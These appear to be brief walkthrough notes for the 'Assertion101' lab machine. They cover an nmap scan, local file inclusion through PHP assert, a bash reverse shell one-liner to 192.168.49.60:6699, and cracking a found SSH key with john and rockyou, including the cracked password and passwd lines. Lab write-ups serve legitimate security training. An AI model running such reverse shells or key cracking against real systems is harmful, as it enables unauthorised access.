🐧Assertion101

Enumeration

Nmap scan

nmap -sV -p- 192.168.60.94 -A

Service Enumeration

Port 22

Document here:

  • Screenshots (web browser, terminal screen)

  • Service version numbers

  • Document your findings when interacting with the service at various stages

Port 80

There is a webpage located here.

Got it to throw an error.

Sent to burp repeater.

LFI

https://book.hacktricks.xyz/pentesting-web/file-inclusion#lfi-via-phps-assert

#!/bin/bash
bash -i >& /dev/tcp/192.168.49.60/6699 0>&1

Shell

Found a id_rsa key in .todeletelater folder

ssh2john id_rsa > id_rsa.hash

Cracking with john

john id_rsa.hash  --wordlist=/usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt

Password:

sozefasalshwamra

Only three users this could be for.

root:x:0:0:root:/root:/bin/bash
soz:x:1000:1000:Faisal:/home/soz:/bin/bash
fnx:x:1001:1001::/home/fnx:/bin/sh

https://h0j3n.medium.com/vulnhub-assertion-1-0-1-eb78a0cb9216

Root

PreviousSamsNextDriftingBlues6

Last updated

Was this helpful?